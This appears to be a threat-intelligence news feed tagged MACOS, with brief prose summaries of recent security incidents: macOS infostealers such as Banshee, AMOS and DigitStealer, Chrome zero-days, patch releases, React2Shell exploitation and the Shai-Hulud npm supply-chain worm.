Banshee is a macOS-native stealer offered as a MaaS that phishes the userโs login password via a fake System Preferences dialog to decrypt the Keychain and harvest browser credentials, cookies, notes, and targeted files before quickly exfiltrating them. It validates passwords with dscl in real-time, collects Keychain plus browser profiles, stages…
Tag: MACOS
Attackers poisoned search results to surface malicious ChatGPT and Grok conversations that instruct macOS users to copy-paste a Terminal one-liner which downloads and deploys an AMOS stealer. The campaign abuses platform and format trust to harvest credentials, escalate to root, persist via a LaunchDaemon, and exfiltrate wallet, browser, and keychain data. #AMOS #macOS
This weekโs cyber stories highlight the rapid evolution of digital threats, from malware in movie downloads to sophisticated botnets exploiting system vulnerabilities. The Threatsday Bulletin provides a concise overview of major security incidents and emerging risks in the cyber landscape. #Mirai #LummaStealer…
Google has issued emergency updates to patch a zero-day vulnerability in Chrome that is actively exploited in the wild, affecting multiple operating systems. Since the beginning of the year, Google has fixed eight zero-day flaws, including recent critical bugs in the LibANGLE library and V8 engine. #ChromeZeroDay #LibANGLE #V8Engine #ThreatActors
Google has released security updates for Chrome to fix three vulnerabilities, including one actively exploited in the wild. The flaws mainly affect Google’s ANGLE library and could lead to memory corruption or arbitrary code execution. #ChromeVulnerabilities #ANGLELibrary…
A new cyberattack campaign exploits Google search ads to direct users to malicious AI chats that install the AMOS macOS infostealer malware. This campaign uses poisoned ChatGPT and Grok conversations to trick users into executing malicious commands, leading to potential data theft and device compromise. #AMOS #Grok #ChatGPT #macOS #Infostealer
This December’s Patch Tuesday includes critical updates for Windows, Notepad++, Fortinet, Ivanti, and more, addressing vulnerabilities actively exploited or publicly known. Timely application of these patches is essential to prevent privilege escalation, remote code execution, and credential bypass attacks. #CVE202562221 #Notepad++V8.8.9…
Adobe has released patches for nearly 140 vulnerabilities across its products, including critical bugs in ColdFusion and Experience Manager (AEM). Prompt application of these updates is urged to protect against potential exploitation. #ColdFusion #ExperienceManager #AdobeVulnerabilities…
A critical unauthenticated deserialization vulnerability in React Server Components (CVE-2025-55182, “React2Shell”) has been exploited in the wild to deliver cryptominers, a BitTorrent-DHTโbacked Linux backdoor (PeerBlight), a reverse-proxy tunnel (CowTunnel), a Go post-exploitation implant (ZinFoq), and a Kaiji botnet variant across multiple organizations. Immediate patching of affected react-server-dom packages and Next.js mitigations are recommended to prevent these automated exploitation campaigns. #React2Shell #PeerBlight #CowTunnel #ZinFoq
Ivanti has issued security updates for multiple vulnerabilities in its Endpoint Manager (EPM) software, including a critical cross-site scripting flaw. These vulnerabilities pose risks primarily to exposed internet-facing instances, with potential remote code execution and session hijacking. #CVE-2025-10573 #EPM #Ivanti
Trend Research describes the discovery and technical analysis of GhostPenguin, a previously undocumented multi-threaded Linux backdoor that provides a remote /bin/sh shell and extensive filesystem operations over an RC5-encrypted UDP channel (initial handshake over UDP port 53). The backdoor was found using an AI-driven VirusTotal zero-detection hunting pipeline that decompiled and…
Google has released a Chrome browser update addressing 13 security vulnerabilities, including four high-severity flaws. One critical flaw, CVE-2025-13633, involves a use-after-free vulnerability in the Digital Credentials feature, potentially exploited by remote attackers. #ChromeUpdate #DigitalCredentialsVulnerability…
Attackers exploited a GitHub Actions injection vulnerability in Nxโs workflow to steal an NPM publishing token, push malicious Nx packages, and use those packages to harvest credentials, SSH keys, and crypto wallets from developer systems. The campaign evolved into a self-replicating NPM supply-chain worm called Shai-Hulud that registers compromised hosts as self-hosted GitHub Actions runners and uses GitHub Discussions as a stealthy C2 channel. #ShaiHulud #Nx
DigitStealer is a macOS information stealer delivered as an unsigned DynamicLake.dmg that runs almost entirely in memory and abuses JavaScript for Automation (JXA) and AppleScript to harvest high-value data. It enforces geographic and Apple Silicon M2+ hardware checks, fetches four in-memory payloads (AppleScript stealer, two obfuscated JXA modules, and a LaunchAgent backdoor using DNS TXT for C2), and tampers with Ledger Live to enable seed-phrase exfiltration. #DigitStealer #LedgerLive
Sha1-Hulud has launched a sophisticated supply-chain attack targeting npm packages used by JavaScript developers, infecting nearly 1,000 packages and exposing tens of thousands of repositories. The latest campaign includes new features like cross-platform support, a self-destruct mechanism, and remote code execution via GitHub Actions, increasing the threat’s severity. #Sha1Hulud #npmSupplyChainAttack…